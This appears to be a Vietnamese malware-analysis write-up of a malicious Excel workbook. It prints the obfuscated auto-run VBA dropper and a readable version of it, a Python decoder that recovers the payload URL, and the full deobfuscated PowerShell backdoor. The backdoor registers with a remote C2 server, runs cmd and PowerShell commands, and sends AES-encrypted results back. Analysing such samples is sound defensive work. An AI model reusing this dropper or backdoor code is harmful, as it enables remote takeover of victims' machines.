¹®µ´¾¥»³ºª´¡¹®¶¶®¦·³«¢¢¢¹µ¹½¸¦§¥§·°°¡µ¼¤¿©¦¸£¥¥¹¦¶¨¹«©§µ¡´²·°º¢·¡¸²µ¤°²³¯£«¶£ As String Dim °»»¦¡½º®¤¼º¬³¤³º¸¶®¨½®©µ«¢´¾´··¦«º¬º°¥²ª¹«¿º¼£º·¦¢¬°¢¾§µ²° As String Dim £©©³¶º©«®®·º¿¿°µ·¡º·«½ª¾¢¢µ¥¹¾²ª¤°¥©½®¥³µ¯¶¹¹´·¹³½²µ£²·¬·¿³¤¹´¨¢º§¯²¦ As Long Dim ³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥¹¤¾½³¥¸²¤µ»°°§§¹¾©·¬·ª°¸°¡¥·µ¬¹¿¬ Dim ²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥ Dim ¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡ As Integer Dim ³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥¹¤¾½³¥¸² Dim ®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°© ¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡ = 1 Range("A1").Value = ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨("4BEiàiuP3x6¿QEi³") Dim ½¹¢²°½¢¼¬µ¥¨³¹²¡£½¬¿´¥ºµ¢ª¥°¸¢¶«µ§¥°°¤µ¸µ¾¦°¹¾¥¹»»·¡¾²°£¬¼·´©·¡·©¾³§¦¤·¶¨¹º°¹©§©££»¥¡¢¾¤ As String ´¸®¢»¬«¢®¼¿¾«²¡»¦°´»·°º¥ª¡½½¤§»´ª§¥¸»®«¶¿¸¶¢³µ¶¾¿¼£²¡¾«¹¶¹§ºµº¦¶¹¦¨¸®¸§¹µ³¢£¯©¦¾·º£¼º²»¨®²¦¤¦·½»¶³ = "$x¿PÜ_jEPkEEiPÜ_6IE3P_i3PÛx¿²PàQBx²³_i³P3x6¿QEi³bPÜ_jEPkEEiPb³x#Eir" & vbCrLf & 
"ÒxP²E³²àEjEP³ÜEbEP3_³_(PÛx¿P_²EP²E7¿à²E3P³xP³²_ib0E²P@mmIP³xP³ÜEP0x##xÄàiuPk_iIP_66x¿i³Pi¿QkE²:P" & vbCrLf & "@m@m@mo@@§mmm" & vbCrLf & "g66x¿i³PÜx#3E²:PLu¿ÛEiPÒÜ_iÜP!xiu" & vbCrLf & "t_iI:PTtPt_iI" ½¹¢²°½¢¼¬µ¥¨³¹²¡£½¬¿´¥ºµ¢ª¥°¸¢¶«µ§¥°°¤µ¸µ¾¦°¹¾¥¹»»·¡¾²°£¬¼·´©·¡·©¾³§¦¤·¶¨¹º°¹©§©££»¥¡¢¾¤ = ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨(´¸®¢»¬«¢®¼¿¾«²¡»¦°´»·°º¥ª¡½½¤§»´ª§¥¸»®«¶¿¸¶¢³µ¶¾¿¼£²¡¾«¹¶¹§ºµº¦¶¹¦¨¸®¸§¹µ³¢£¯©¦¾·º£¼º²»¨®²¦¤¦·½»¶³) MsgBox ½¹¢²°½¢¼¬µ¥¨³¹²¡£½¬¿´¥ºµ¢ª¥°¸¢¶«µ§¥°°¤µ¸µ¾¦°¹¾¥¹»»·¡¾²°£¬¼·´©·¡·©¾³§¦¤·¶¨¹º°¹©§©££»¥¡¢¾¤, vbInformation, ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨("pEP3EEB#ÛP²Eu²E³P³xPài0x²QPÛx¿") Dim ¢¶¸¡³·´®¨½¥¡¼»´§²¾½º¢¿°°¹¹££©´¢©¹ª¬»¡¡°º·«¶²¦¾²¦¹º¤¹¼»«»¬º¤¸½¥¹¬²§¶°¾·»§©¥ª As Date Dim ¹»«´¾¹¡º¸¿°·¶¥µ¢µ¾²¦¥§¶¨´²½°·£®·»ª¡¬¬»½µ³©·»¾¤·¹¤µ®º¤¸§¶·¢·¹º££§¬¸ As Date ¢¶¸¡³·´®¨½¥¡¼»´§²¾½º¢¿°°¹¹££©´¢©¹ª¬»¡¡°º·«¶²¦¾²¦¹º¤¹¼»«»¬º¤¸½¥¹¬²§¶°¾·»§©¥ª = Date ¹»«´¾¹¡º¸¿°·¶¥µ¢µ¾²¦¥§¶¨´²½°·£®·»ª¡¬¬»½µ³©·»¾¤·¹¤µ®º¤¸§¶·¢·¹º££§¬¸ = DateSerial(2023, 6, 6) If ¢¶¸¡³·´®¨½¥¡¼»´§²¾½º¢¿°°¹¹££©´¢©¹ª¬»¡¡°º·«¶²¦¾²¦¹º¤¹¼»«»¬º¤¸½¥¹¬²§¶°¾·»§©¥ª < ¹»«´¾¹¡º¸¿°·¶¥µ¢µ¾²¦¥§¶¨´²½°·£®·»ª¡¬¬»½µ³©·»¾¤·¹¤µ®º¤¸§¶·¢·¹º££§¬¸ Then Set ³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥¹¤¾½³¥¸² = CreateObject("microsoft.xmlhttp") Set ²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥ = CreateObject("Shell.Application") ³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥¹¤¾½³¥¸²¤µ»°°§§¹¾©·¬·ª°¸°¡¥·µ¬¹¿¬ = ¦¡º¾¿°®¹½º°¡£¿¡¢³´º¥¦²¤°°·¥®½½¡¶«¥¸¹«©·¬°·®¶£³¬§§¹°«µ©¹¢´¥ª¾¾¸»¹©§²·°¢ª¸¢£¡ + ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨("\k¿i6Ü_~Bb@") ³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥¹¤¾½³¥¸².Open "get", 
ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨("ܳ³Bb://uàb³~uà³Ü¿k¿bE²6xi³Ei³~6xQ/k7¿_iQ_i/fÀ3_o-3Yf0_E6m6kk3_km§3Y03ÀY_3__/²_Ä/À3EÀkfmfÀ@Eããoãä§k@_@ã0ä6_E3-ãY036-@@koo/_Àmb6m@§~Bb@"), False ³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥¹¤¾½³¥¸².send ´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦ = ³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥¹¤¾½³¥¸².responseBody If ³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥¹¤¾½³¥¸².Status = 200 Then Set ¥·µ¬¹¿¬¯¨³³¿¯©¶¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼ = CreateObject("adodb.stream") ¥·µ¬¹¿¬¯¨³³¿¯©¶¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼.Open ¥·µ¬¹¿¬¯¨³³¿¯©¶¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼.Type = ¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡ ¥·µ¬¹¿¬¯¨³³¿¯©¶¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼.Write ´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦ ¥·µ¬¹¿¬¯¨³³¿¯©¶¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼.SaveToFile ³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥¹¤¾½³¥¸²¤µ»°°§§¹¾©·¬·ª°¸°¡¥·µ¬¹¿¬, ¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡ + ¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡ ¥·µ¬¹¿¬¯¨³³¿¯©¶¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼.Close End If ²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥.Open (³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥¹¤¾½³¥¸²¤µ»°°§§¹¾©·¬·ª°¸°¡¥·µ¬¹¿¬) Else MsgBox 
ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨("åxi'³P³²ÛP³xP²¿iPQEPk²x") End If End Sub ------------------------------------------------------------------------------- VBA MACRO Sheet2.cls in file: Danh%20s%C3%A1ch%20ph%C3%B2ng%20thi(1).xls - OLE stream: '_VBA_PROJECT_CUR/VBA/Sheet2' - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - (empty macro) ------------------------------------------------------------------------------- VBA MACRO Sheet3.cls in file: Danh%20s%C3%A1ch%20ph%C3%B2ng%20thi(1).xls - OLE stream: '_VBA_PROJECT_CUR/VBA/Sheet3' - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - (empty macro) ------------------------------------------------------------------------------- VBA MACRO xlm_macro.txt in file: xlm_macro - OLE stream: 'xlm_macro' - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet ' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet ' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet +----------+--------------------+---------------------------------------------+ |Type |Keyword |Description | +----------+--------------------+---------------------------------------------+ |AutoExec |AutoOpen |Runs when the Word document is opened | |AutoExec |DocumentOpen |Runs when the Word document is opened | |AutoExec |Document_Open |Runs when the Word or Publisher document is | | | |opened | |AutoExec |Auto_Open |Runs when the Excel Workbook is opened | |AutoExec |Workbook_Open |Runs when the Excel Workbook is opened | |Suspicious|Open |May open a file | |Suspicious|Write |May write to a file (if combined with Open) | |Suspicious|adodb.stream |May create a text file | |Suspicious|SaveToFile |May create a text file | |Suspicious|Shell |May run an executable file or a system | | | 
|command | |Suspicious|WScript.Shell |May run an executable file or a system | | | |command | |Suspicious|CreateObject |May create an OLE object | |Suspicious|Shell.Application |May run an application (if combined with | | | |CreateObject) | |Suspicious|microsoft.xmlhttp |May download files from the Internet | |Suspicious|Chr |May attempt to obfuscate specific strings | | | |(use option --deobf to deobfuscate) | |Suspicious|Hex Strings |Hex-encoded strings were detected, may be | | | |used to obfuscate strings (option --decode to| | | |see all) | +----------+--------------------+---------------------------------------------+ ``` Đến đây nhận thấy code này đã bị obfuscate, đem vào vscode và chỉnh một xíu ở phần tên hàm tên biến để cho dễ đọc. ```bash Function a(b) c = " ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ¿¡²³ÀÁÂÃÄÅÒÓÔÕÖÙÛÜàáâãä娶§Ú¥" d = "ãXL1lYU~Ùä,Ca²ZfÃ@dO-cq³áÕsÄJV9AQnvbj0Å7WI!RBg§Ho?K_F3.Óp¥ÖePâzk¶ÛNØ%G mÜ^M&+¡#4)uÀrt8(ÒSw|T*Â$EåyhiÚx65Dà¿2ÁÔ" For y = 1 To Len(b) e = InStr(c, Mid(b, y, 1)) If e > 0 Then f = Mid(d, e, 1) g = g + f Else g = g + Mid(b, y, 1) End If Next a = g For h = 1 To Len(i) i = h Next For j = 2 To Len(k) k = 2 Next For l = 3 To Len(m) m = l Next For n = 4 To Len(o) o = 2 Next End Function Sub Workbook_Open() Dim p As Object Dim q As String Dim r As String Dim s As String Dim t As Integer t = Chr(50) + Chr(48) + Chr(48) Set p = CreateObject("WScript.Shell") q = p.SpecialFolders("AppData") Dim u Dim v Dim y Dim h As Long Dim j As String Dim x As Long Dim m As String Dim l As Long Dim n As String Dim y As String Dim k As Long Dim z Dim w Dim val1 As Integer Dim val2 Dim val3 val1 = 1 Range("A1").Value = a("4BEiàiuP3x6¿QEi³") Dim val4 As String val5 = "$x¿PÜ_jEPkEEiPÜ_6IE3P_i3PÛx¿²PàQBx²³_i³P3x6¿QEi³bPÜ_jEPkEEiPb³x#Eir" & vbCrLf & "ÒxP²E³²àEjEP³ÜEbEP3_³_(PÛx¿P_²EP²E7¿à²E3P³xP³²_ib0E²P@mmIP³xP³ÜEP0x##xÄàiuPk_iIP_66x¿i³Pi¿QkE²:P" & vbCrLf & "@m@m@mo@@§mmm" & vbCrLf & "g66x¿i³PÜx#3E²:PLu¿ÛEiPÒÜ_iÜP!xiu" & 
vbCrLf & "t_iI:PTtPt_iI" val4 = a(val5) MsgBox val4, vbInformation, a("pEP3EEB#ÛP²Eu²E³P³xPài0x²QPÛx¿") Dim val6 As Date Dim val7 As Date val6 = Date val7 = DateSerial(2023, 6, 6) If val6 < val7 Then Set val2 = CreateObject("microsoft.xmlhttp") Set w = CreateObject("Shell.Application") z = q + a("\k¿i6Ü_~Bb@") val2.Open "get", a("ܳ³Bb://uàb³~uà³Ü¿k¿bE²6xi³Ei³~6xQ/k7¿_iQ_i/fÀ3_o-3Yf0_E6m6kk3_km§3Y03ÀY_3__/²_Ä/À3EÀkfmfÀ@Eããoãä§k@_@ã0ä6_E3-ãY036-@@koo/_Àmb6m@§~Bb@"), False val2.send v = val2.responseBody If val2.Status = 200 Then Set u = CreateObject("adodb.stream") u.Open u.Type = val1 u.Write v u.SaveToFile z, val1 + val1 u.Close End If w.Open (z) Else MsgBox a("åxi'³P³²ÛP³xP²¿iPQEPk²x") ``` Chú ý từ 2 đoạn là: Đầu tiên là từ Function a(b) -> End Function ```bassh Function a(b) c = " ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ¿¡²³ÀÁÂÃÄÅÒÓÔÕÖÙÛÜàáâãä娶§Ú¥" d = "ãXL1lYU~Ùä,Ca²ZfÃ@dO-cq³áÕsÄJV9AQnvbj0Å7WI!RBg§Ho?K_F3.Óp¥ÖePâzk¶ÛNØ%G mÜ^M&+¡#4)uÀrt8(ÒSw|T*Â$EåyhiÚx65Dà¿2ÁÔ" For y = 1 To Len(b) e = InStr(c, Mid(b, y, 1)) If e > 0 Then f = Mid(d, e, 1) g = g + f Else g = g + Mid(b, y, 1) End If Next a = g For h = 1 To Len(i) i = h Next For j = 2 To Len(k) k = 2 Next For l = 3 To Len(m) m = l Next For n = 4 To Len(o) o = 2 Next End Function ``` Thứ 2 là đoạn này ```bash z = q + a("\k¿i6Ü_~Bb@") val2.Open "get", a("ܳ³Bb://uàb³~uà³Ü¿k¿bE²6xi³Ei³~6xQ/k7¿_iQ_i/fÀ3_o-3Yf0_E6m6kk3_km§3Y03ÀY_3__/²_Ä/À3EÀkfmfÀ@Eããoãä§k@_@ã0ä6_E3-ãY036-@@koo/_Àmb6m@§~Bb@"), False val2.send ``` Function `a(b)` phía trên sẽ dùng để decode cái URL này, giờ mình sẽ convert nó qua python rồi chạy lấy URL ```python def a(b): c = " ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ¿¡²³ÀÁÂÃÄÅÒÓÔÕÖÙÛÜàáâãä娶§Ú¥" d = "ãXL1lYU~Ùä,Ca²ZfÃ@dO-cq³áÕsÄJV9AQnvbj0Å7WI!RBg§Ho?K_F3.Óp¥ÖePâzk¶ÛNØ%G mÜ^M&+¡#4)uÀrt8(ÒSw|T*Â$EåyhiÚx65Dà¿2ÁÔ" g = "" for y in range(len(b)): e = c.find(b[y]) if e > -1: f = d[e] g += f else: g += b[y] a = g return a print( 
a("ܳ³Bb://uàb³~uà³Ü¿k¿bE²6xi³Ei³~6xQ/k7¿_iQ_i/fÀ3_o-3Yf0_E6m6kk3_km§3Y03ÀY_3__/²_Ä/À3EÀkfmfÀ@Eããoãä§k@_@ã0ä6_E3-ãY036-@@koo/_Àmb6m@§~Bb@"))
```

The result is the URL: https://gist.githubusercontent.com/bquanman/98da73d49faec0cbbdab02d4fd84adaa/raw/8de8b90981e667652b1a16f5caed364fdc311b77/a80sc012.ps1

The URL serves a piece of PowerShell code. Download it and deobfuscate it with PowerDecode; this is the result:

```powershell
${8rT3WA} = [tyPe]'sySTEm.seCUrItY.cryPTOGRaphY.CiphERMOde' ;
SV '72j5O' ( [TYpe]'sYstem.seCuriTY.cRYptoGRapHY.paDDingmOde' ) ;
${XNfD}=[tyPe]'System.cONVErT' ;
${HLvW1} = [tYPe]'SYStEM.tEXt.EnCOdiNG';
SeT-iTem 'vARIabLE:92y7' ( [Type]'SysteM.NEt.dnS') ;
${UJXRc}=[tyPE]'StrinG' ;
function CrEATe-AeSmanAGeDoBJeCt(${vxZTmff}, ${5TMRWpLUy}) {
    ${AJuJVRAZ99} = New-Object 'System.Security.Cryptography.AesManaged'
    ${AJUjvrAZ99}.Mode = ( gEt-vARIAblE ("8rt3Wa") -Value )::"cBc"
    ${aJujVRAZ99}.PAddInG = ( Dir 'vARIable:72j5o' ).VALUe::"zeRos"
    ${AJUJvrAz99}.BlOckSizE = 128
    ${AjuJvRAz99}.keysIze = 256
    if (${5TMRWPluy}) {
        if (${5TmRWpLuy}.getType.iNVOke().nAME -eq 'String') {
            ${ajUjvRaZ99}.Iv = (dir 'vaRIaBle:xNFd').vAlUe::'FromBase64String'.InVOKe(${5TMRWPlUy})
        } else {
            ${ajUjVraZ99}.IV = ${5tmRwPLUy}
        }
    }
    if (${VxZtMFF}) {
        if (${VXzTmfF}.getType.INvoKe().nAME -eq 'String') {
            ${ajUjVraZ99}.Key = ( LS 'VariAble:XNFD' ).vAluE::'FromBase64String'.invOKe(${vxzTmFF})
        } else {
            ${AjUJVrAZ99}.key = ${vXzTmff}
        }
    }
    ${aJUjvRAZ99}
}
function eNCRYpT(${VxzTMFf}, ${ROFPdqRF99}) {
    ${ByTES} = ( varIable 'hlvW1' ).vALUE::"uTf8".GetBytes.INVokE(${rOFpdQRF99})
    ${ajujVRAZ99} = Create-AesManagedObject ${VXZtMFf}
    ${qDIqLGaQ99} = ${aJujVRAZ99}.CreateEncryptor.inVoKe()
    ${lwihYmIF99} = ${QdiqLgaq99}.TransformFinalBlock.iNvOKe(${byTeS}, 0, ${byTes}.LeNgTh);
    [byte[]] ${fJAxUWQN99} = ${AJujvRAz99}.Iv + ${lWiHYmiF99}
    ${ajUJVRAZ99}.Dispose.iNVOKE()
    ${xNFd}::"tOBase64STRiNG".iNvoke(${FjAXUWqN99})
}
function deCRyPT(${VXztmFF}, ${bKJrxQCf99}) {
    ${bYTEs} = (vARiable 'xnfd' ).ValuE::'FromBase64String'.InVOKE(${BkjRxqcF99})
    ${5tMRWpLuY} = ${BYTes}[0..15]
    ${aJuJVraz99} = Create-AesManagedObject ${VxZTmFF} ${5TMRwpLUY}
    ${MNDmWYnB99} = ${AJUjvRAz99}.CreateDecryptor.InVoke();
    ${AhtLMYhl99} = ${MNDmWynB99}.TransformFinalBlock.iNvokE(${bYTES}, 16, ${byTeS}.lENgTH - 16);
    ${AJUjVRAZ99}.Dispose.INVOKE()
    ${HLVW1}::"uTF8".GETStriNg(${AhtLmYhl99}).TRIM([char]0)
}
function ShELL(${DfJz1co}, ${yo8xm5}){
    ${CwzVYVJ} = New-Object 'System.Diagnostics.ProcessStartInfo'
    ${CwZVyVj}.FIlename = ${DFjZ1co}
    ${CWzvYvj}.reDIRecTsTAnDaRdERrOR = ${TRue}
    ${cwZVYVJ}.ReDIREcTsTANdarDoUTPUT = ${tRUe}
    ${CWZvyVJ}.USEshELleXeCUTe = ${FALsE}
    ${cwzvyVJ}.aRgUmENtS = ${yO8xm5}
    ${p} = New-Object 'System.Diagnostics.Process'
    ${P}.sTArTiNFO = ${CWzvYVj}
    ${p}.Start.INvoKE() | Out-Null
    ${P}.WaitForExit.invoKE()
    ${BHnxNUrW99} = ${p}.staNdardOuTpUT.ReadToEnd.INVOkE()
    ${NmWkjOAB99} = ${p}.StANdArdeRrOR.ReadToEnd.Invoke()
    ${kCNjcQdL} = ('VALID '+"$BhnXnUrW99n$nmWKJOAb99")
    ${KcnJcQDl}
}
${FZvyCr} = '128.199.207.220'
${twFTrI} = '7331'
${VxzTmff} = 'd/3KwjM7m2cGAtLI67KlhDuXI/XRKSTkOlmJXE42R+M='
${n} = 3
${Cwj2TWh} = ""
${yCRUTw} = ${92Y7}::'GetHostName'.inVoKE()
${FNFFGXDzj} = "p"
${DFctDFM} = ('http:' + "//$FZVYCR" + ':' + "$TwFTRi/reg")
${kVQBXbuR} = @{
    'name' = "$YCRUTw"
    'type' = "$fNFFGXDZJ"
}
${CWj2TWh} = (Invoke-WebRequest -UseBasicParsing -Uri ${dFctDFM} -Body ${kVqBxbUr} -Method 'POST').coNTENT
${TvYMeYrR99} = ('http:' + "//$FZVYCR" + ':' + "$TwFTRi/results/$cWJ2Twh")
${iJfySE2} = ('http:' + "//$FZVYCR" + ':' + "$TwFTRi/tasks/$cWJ2Twh")
for (;;){
    ${MA04XMgY} = (Invoke-WebRequest -UseBasicParsing -Uri ${IJFYSE2} -Method 'GET').cONTeNt
    if (-Not ${UJXRc}::'IsNullOrEmpty'.INvOKe(${MA04XmGy})){
        ${mA04XMgY} = Decrypt ${VXZTmff} ${Ma04XMgY}
        ${mA04XMgY} = ${ma04XMgy}.split.INvokE()
        ${FLAG} = ${MA04xmgY}[0]
        if (${FlAg} -eq 'VALID'){
            ${WB1SWYoje} = ${MA04XMgY}[1]
            ${yO8XM5S} = ${Ma04XMgY}[2..${MA04xmgY}.LeNgTH]
            if (${wb1sWyoJe} -eq 'shell'){
                ${F} = 'cmd.exe'
                ${yO8XM5} = "/c "
                foreach (${a} in ${yo8xM5s}){
                    ${Yo8xm5} += ${a} + " "
                }
                ${KcNJCQdL} = shell ${f} ${yo8xM5}
                ${kCnjCQDL} = Encrypt ${VxztMFF} ${kcNjcqdl}
                ${kvqbXBUr} = @{'result' = "$KcnJCQDl"}
                Invoke-WebRequest -UseBasicParsing -Uri ${tVyMEyRR99} -Body ${kVQbXbur} -Method 'POST'
            } elseif (${Wb1SwYOJe} -eq 'powershell'){
                ${f} = 'powershell.exe'
                ${yO8Xm5} = "/c "
                foreach (${a} in ${Yo8xM5s}){
                    ${YO8xm5} += ${a} + " "
                }
                ${kcNjcqdL} = shell ${F} ${yO8XM5}
                ${kcnjCQDL} = Encrypt ${vXZTmfF} ${KCNjcqDl}
                ${KVqbxBUr} = @{'result' = "$KcnJCQDl"}
                Invoke-WebRequest -UseBasicParsing -Uri ${tvyMEYRR99} -Body ${kVqBXbUr} -Method 'POST'
            } elseif (${wb1swYOJe} -eq 'sleep'){
                ${n} = [int]${yO8Xm5S}[0]
                ${kVQBXbur} = @{'result' = ""}
                Invoke-WebRequest -UseBasicParsing -Uri ${tVYmeyrR99} -Body ${KvQBXBur} -Method 'POST'
            } elseif (${wb1sWyojE} -eq 'rename'){
                ${cwJ2tWh} = ${YO8Xm5S}[0]
                ${TVYmeyRr99} = ('http:' + "//$FZVYCR" + ':' + "$TwFTRi/results/$cWJ2Twh")
                ${ijFYsE2} = ('http:' + "//$FZVYCR" + ':' + "$TwFTRi/tasks/$cWJ2Twh")
                ${kVQbXbUr} = @{'result' = ""}
                Invoke-WebRequest -UseBasicParsing -Uri ${TVYmEyRR99} -Body ${KvqBxbUr} -Method 'POST'
            } elseif (${wB1sWYOJe} -eq 'quit'){
                exit
            }
        }
        sleep ${N}
    }
}
```

This is AES-256 encryption with the key `${vXzTmff} = 'd/3KwjM7m2cGAtLI67KlhDuXI/XRKSTkOlmJXE42R+M='`.

The IV and the plaintext are handled in the `Decrypt` function.

After `Decrypt`, the result is stored in the array `${kVQBXbur}` and sent out in a POST request.

![](https://hackmd.io/_uploads/r1yAertFn.png)

